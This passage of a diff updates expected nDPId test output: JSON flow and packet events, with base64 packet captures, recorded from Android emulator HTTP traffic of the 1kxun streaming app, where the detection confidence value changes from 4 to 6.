{"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/301\/5027-d707192bfa2dabf22771a4d56454ab88.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136216,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIGp5AAEAGNnDAqAJ+rGl5UrSEAFDq37\/yn5TBcIAYAfbp3AAAAQEICvK1GtzJoc6cR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzMwMC81MTgzLTUxZmI5OWEyMzkxZTc3NDAzN2JhMjFjYmNhMzA3YmU0LmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/300\/5183-51fb99a2391e774037ba21cbca307be4.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/300\/5183-51fb99a2391e774037ba21cbca307be4.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1654385136274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":564,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":564,"pkt_l4_len":530,"thread_ts_msec":1654385136274,"pkt":"tKXvZygQnLbQ0+MzCABFAAImA99AAEAGThTAqAJ+rGh3UMBaAFDHE\/BHhHHVuYAYAfXo9wAAAQEICpOtI+NiB5cBUE9TVCAvYXBpL3VwbG9hZC5waHAgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1MZW5ndGg6IDI2NA0KSG9zdDogYW5kcm9pZC55aW5nc2hpLnRjY2xpY2suMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0KeJxNkNFuhCAQRX+lmWdjFESRt+0vNH1qGoMwu0tUMIiuycZ\/L7ht0oQH5lzmzmWeEMyES5DTDKKsWUU5KynL3kDjZhSCeMKqjQYBmlBkBHnb9Lq6Ut5qXaimokTxuoxdkIG6S2txjI\/LYV9tJJPTZ73oobvNd2ex23kdhd5Lm1xvzt1GjMAt3YZ+Mc6m9uQm5\/kfIjnPSX5Okd4b9JFdrPYuhsvA4+LGNfx2F7zYy6atojA6JaO\/ALTd50cEFsPD+SGSh7maNOZl0p2f7FskvGlqyipNWJuCTVJFoSCiZOKdiKJ4HTjSkmSQaUVSBbOZYHAB8fWdAe4K55Tmr97QhvN+HD8N\/HBS"} 00898{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1654385136559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1654385136559,"pkt":"nLbQ0+MztKXvZygQCABFAAF0doZAADcG4xusaXlSwKgCfgBQtGjFFLnQ+R3w94AYAOsxxAAAAQEICsmhz1XytRrSSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDQ1NzQ2DQpMYXN0LU1vZGlmaWVkOiBUdWUsIDEwIE1heSAyMDIyIDAzOjE1OjEzIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KRVRhZzogIjYyNzlkOGMxLWIyYjIiDQpFeHBpcmVzOiBGcmksIDAyIFNlcCAyMDIyIDIzOjI1OjM2IEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT03Nzc2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQo="} 02504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1654385136559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385136559,"pkt":"nLbQ0+MztKXvZygQCABFAAXUdodAADcG3rqsaXlSwKgCfgBQtGjFFLsQ+R3w94AQAOuqegAAAQEICsmhz1XytRrS\/9j\/4AAQSkZJRgABAQAAAQABAAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMABAIDAwMCBAMDAwQEBAQFCQYFBQUFCwgIBgkNCw0NDQsMDA4QFBEODxMPDAwSGBITFRYXFxcOERkbGRYaFBYXFv\/bAEMBBAQEBQUFCgYGChYPDA8WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFv\/AABEIAQQCgAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APk7XL28GtXY+2XHE7\/8tD\/eNc59AkrIq\/br3\/n8uP8Av4aB2Qfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/Lj\/AL+GgLIBfXvP+mT\/APfw0BZB9uvf+fy4\/wC\/hoCyD7de\/wDP5cf9\/DQFkH269\/5\/Lj\/v4aAsg+3Xv\/P5cf8Afw0BZB9uvf8An8uP+\/hoCyD7de\/8\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/Lj\/AL+GgLIPt17\/AM\/lx\/38NAWQfbr3\/n8uP+\/hoCyEa+viOLyf\/v4aAshft17\/AM\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8\/lx\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fyf\/v4aAsg+3Xv\/P5P\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fyf\/v4aAsg+3Xv\/P5P\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fy4\/7+GgLIPt17\/wA\/lx\/38NAWQfbr3\/n8uP8Av4aAsgN9e5x9sn\/7+GgLIPt17\/z+T\/8Afw0BZB9uvf8An8uP+\/hoCyD7de\/8\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/J\/+\/hoK5A+3Xv8Az+T\/APfw0XDlFF5en\/l8n\/7+GlzAoXHJdXxPF5Of+2hpc5pGm9ixFLfMB\/pdwP8AtqahyR0wpX6FqA3\/APz9z++JDWTmdEMNd7F2EX2Aftc\/p\/rDUOpY6IYdLoW4Ptn\/AD8zHPGfMNQ6l2ddPDxavYsKbsOCLifA6fvDzUc7Nlho9iwj3Q+U3M3Xp5hpObsUqC7DxLdg\/wDHzPwefnNS5GkaK7E6S3hAH2if\/v4aXMX7NdhwkvMAfapsZ5\/eGjmLVFdiRJ7kEAXMpAGfvn86LmnsY9hPtN5ux9plHtvPSjmE6UV0Q1bm727hcS493PFHML2cexE15dZyLmbp"} @@ -763,115 +763,114 @@ 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1654385136563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385136563,"pkt":"nLbQ0+MztKXvZygQCABFAAXU7ZhAADYGaKmsaXlSwKgCfgBQtHgmuiQMUbJfToAQAOskjAAAAQEICsmhz1rytRrb\/9j\/4AAQSkZJRgABAQEAeAB4AAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMABAIDAwMCBAMDAwQEBAQFCQYFBQUFCwgIBgkNCw0NDQsMDA4QFBEODxMPDAwSGBITFRYXFxcOERkbGRYaFBYXFv\/bAEMBBAQEBQUFCgYGChYPDA8WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFv\/AABEIASICJgMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APvKRyGwMdB1UelMQm9v9n\/vkU7CuSBjjt+QoAXcfb8hQAbj7fkKAFDHHb8qADcfb8qADcfb8qADcfb8qAFBOO35UWC4uT7flRYLhk+35UWC4ZPt+VFguKM+35UWC4Z+n5UALn6flQAZ+n5UAVtWhW50y4gYAiSJlxjrxWNeHPSlHujWlU5KkZdmcx8J72WSwuLGbGYH3KCBkA9RXm5ZUvCVPsevnNJOUKy6o69T9Pyr1E9EeHfUXP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XAfh+VAXF\/AUBcPwFAXD8BQFw\/AUBcPwFAXD8BQFw\/AUBcPwFAXD8BQFw\/AUBcD07UBcQHnt+VFwuKenagLiZ+n5UXC4A89vyouFxfyoC4mcelAXGPMiDJKigGzH8ReKtJ0iBpLu6RcD7vVj+FUTzjvCGrLrGmLfou1ZeVDIAQM96Aua4PI6dfSgdx\/4CpHcPwFAXD8BQFzP8R3IttNlkOMbT2FY4iX7oZ4f4nk\/te7NpHLIhDE5XFfKSb7jLBkk0HSQQfMfgYIzWEm+5Ri+KPFcml6Wbt5cueQoArSg33JlI4mz+MAt70C68z96TtJTgVvyzkY+0Ox8H3V3r9294t0fKZflHpWclLuXF8wx9Lmg1G4+2TF4C2Qx9Kz53Hqanmnxtu49KvLe+tLx1ROCobHWuvD3mtzCruP8ACnxEvrqW1WB5JPNIXBXIFazpytqRTlqdh8OtY1q1+NWmW97bFY7xiI328fdNVg7e2SudB9H6PLINTuVJXqD9wcV9KSbIdsfw\/wDfIoC4ySRicfL\/AN8igCGSWUcqF\/74H+FSy48vUjiunMhBC5Xr8g\/woKlHsTPc4jJZkA91FBBxfjr4maLoKzW8UqXV7FHv+zxKpO3OM+lRKVioxueXL8U9bvrj7Vq2qWumWjriKGBVzuyeST\/s1nds2SsfRUv3\/wAB\/KutHKwoAkHSgAoAKAHDpQAUAFABQA4dKACgAoAUdaAFoAKACgAo"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":953,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":953,"pkt_l4_len":919,"thread_ts_msec":1654385139579,"pkt":"tKXvZygQnLbQ0+MzCABFAAOrd4dAAEAGTmTAqAJ+Zx1HHomAAFCgxdnYmdL2h4AYAfZ0\/wAAAQEICoGE\/JiYFaLeR0VUIC9jLzM1LzEzMjc3PyZfaW5fYXBwPWthbmthbiZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmX3Y9Mi44LjIuMSZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9MTEmX2JyYW5kPUdvb2dsZSZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9nYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZ0PTE2NTQzODUxMzYmXz0xNjU0Mzg1MTM3OTY4Jl9jaGFubmVsPTFreHVuJl9sb2NhbGU9VVNfZW4mX2NhcnJpZXI9MzEwMjYwJl9yZXNvbHV0aW9uPTEwODAlMkMxNzk0Jl9haWQ9NWFjNmEwZmYtOGQxOC00N2JjLWE5MDItMjgxMmNmMGMyNTFlIEhUVFAvMS4xDQpIb3N0OiByZWxlYXNlLmJpZ2RhdGEuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjkNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KDQo="} -01311{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"release.bigdata.1kxun.com","url":"release.bigdata.1kxun.com\/c\/35\/13277?&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385136&_=1654385137968&_channel=1kxun&_locale=US_en&_carrier=310260&_resolution=1080%2C1794&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01311{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"release.bigdata.1kxun.com","url":"release.bigdata.1kxun.com\/c\/35\/13277?&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385136&_=1654385137968&_channel=1kxun&_locale=US_en&_carrier=310260&_resolution=1080%2C1794&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":563,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":563,"pkt_l4_len":529,"thread_ts_msec":1654385139941,"pkt":"nLbQ0+MztKXvZygQCABFAAIlZ39AADYGafJnHUcewKgCfgBQiYCZ0vaHoMXdT4AYAffzugAAAQEICpgVo9OBhPyYSFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTozOSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KWC1Qb3dlcmVkLUJ5OiBQSFAvNy4xLjE3DQpMb2NhdGlvbjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvZGV0YWlsP2lkPTI3MTU5JnN5dGpkdCZfaW5fYXBwPWthbmthbiZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmX3Y9Mi44LjIuMSZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9MTEmX2JyYW5kPUdvb2dsZSZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9nYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZ0PTE2NTQzODUxMzkNCg0KMA0KDQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":831,"pkt_l4_len":797,"thread_ts_msec":1654385140171,"pkt":"tKXvZygQnLbQ0+MzCABFAAMxxydAAEAG\/ubAqAJ+oXUNHbFEAFArm5Oyz2Zv74AYAfZ03AAAAQEICrrGE\/SXERVjR0VUIC9kZXRhaWw\/aWQ9MjcxNTkmc3l0amR0Jl9pbl9hcHA9a2Fua2FuJl91ZGlkPWU2ZGJkMzBiLTNiODQtNDRiNC05NzUxLTYzMTE0OGEzZWRlOSZfdj0yLjguMi4xJl9wYWNrYWdlPWNvbS5zY2VuZXdheS5rYW5rYW4mX21vZGVsPXNka19ncGhvbmVfeDg2Jl9vdj0xMSZfYnJhbmQ9R29vZ2xlJl9hbmRyb2lkX2lkPWI5ZTI4Nzc2MzU0ZDI1OWUmX2dhaWQ9NWFjNmEwZmYtOGQxOC00N2JjLWE5MDItMjgxMmNmMGMyNTFlJnQ9MTY1NDM4NTEzOSBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45DQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCg0K"} -01182{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/detail?id=27159&sytjdt&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385139","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01182{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 